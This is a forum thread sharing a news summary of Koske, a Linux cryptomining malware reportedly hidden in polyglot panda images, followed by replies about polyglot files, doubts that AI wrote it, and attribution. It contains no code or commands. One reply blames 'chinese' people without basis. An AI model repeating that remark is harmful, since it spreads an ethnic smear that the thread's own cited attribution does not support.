AI-Generated Malware in Panda Image Hides Persistent Linux Threat (www.aquasec.com)
from cm0002@lemmy.world to cybersecurity@infosec.pub on 25 Jul 14:07
https://lemmy.world/post/33457177

A sophisticated Linux malware called Koske, discovered in July 2025, hides malicious code within innocent-looking panda bear JPEG images to deploy cryptocurrency miners and establish persistent system access[^1]. Security researchers at AquaSec believe Koske was developed using artificial intelligence, based on its adaptive behaviors and code structure[^2].

The malware exploits misconfigured JupyterLab instances to gain initial access, then downloads two panda images containing separate payloads - a C-based rootkit and a shell script[^3]. Rather than using steganography, Koske employs polyglot files that function as both valid images and executable scripts[^1].

Once executed, the malware:

  • Deploys CPU and GPU-optimized miners for 18 different cryptocurrencies
  • Establishes persistence through cron jobs and systemd services
  • Uses LD_PRELOAD to hide malicious processes and files
  • Manipulates DNS settings and network configurations
  • Automatically switches mining pools if one becomes unavailable[^1]

“Impersonation and psychological warfare will be a big thing in the coming years,” warns Rem Dudas from Palo Alto Networks, noting how AI enables malware to mimic other threat actors’ techniques[^4].

[^1]: BleepingComputer - New Koske Linux malware hides in cute panda images

[^2]: The420 - How Is A “Panda” Becoming a Persistent Threat?

[^3]: Securitricks - AI-Generated Malware in Panda Image Hides Persistent Linux Threat

[^4]: BetaNews - Hackers are using AI and panda images to infect Linux machines

#cybersecurity

threaded - newest

Diplomjodler3@lemmy.world on 25 Jul 14:54 next collapse

What the fuck are polyglot files and whoever the fuck thought it was a good idea to invent stuff like that?

baod_rate@programming.dev on 25 Jul 17:53 next collapse

It’s just a consequence of independent file formats. There’s bound to be overlap in what counts as technically a valid X and also technically a valid Y. It’s pretty much unavoidable. The tricky part is figuring out what fits in that sliver of the venn diagram but is also useful as malware.

tribut@infosec.pub on 25 Jul 21:41 collapse

If you haven’t heard of polyglots, you might enjoy every talk by Ange Albertini. Start here (they are all awesome): Funky File Formats

Blaster_M@lemmy.world on 25 Jul 16:28 next collapse

…and this is where sanitizing inputs becomes even more important…

baod_rate@programming.dev on 25 Jul 17:53 next collapse

Researchers from AquaSec have noted its ability to automatically switch to backup mining pools if a primary one becomes unavailable, ensuring continuous operation. This level of sophistication has led security experts to believe that large language models or other automation frameworks may have played a role in its development.

Is it just me or is this not a very convincing rationale.

AmbitiousProcess@piefed.social on 25 Jul 19:21 collapse

Not whatsoever.

Practically any mining software would allow you to change a pool whenever you felt like it, and making a script that just goes "oh, x.x.x.x isn't responding anymore, I should point my hashrate to y.y.y.y now" is... not hard, to say the least.

Goten@piefed.social on 25 Jul 19:04 collapse

damn chinese

Cyber@feddit.uk on 26 Jul 06:48 collapse

“Impersonation and psychological warfare will be a big thing in the coming years,” warns Rem Dudas from Palo Alto Networks, noting how AI enables malware to mimic other threat actors’ techniques

Might be <%your country%>?

AquaSec identified Serbia-based IP addresses used in the attacks, Serbian phrases in the scripts, and Slovak language in the GitHub repository hosting the miners, but it could make no confident attribution.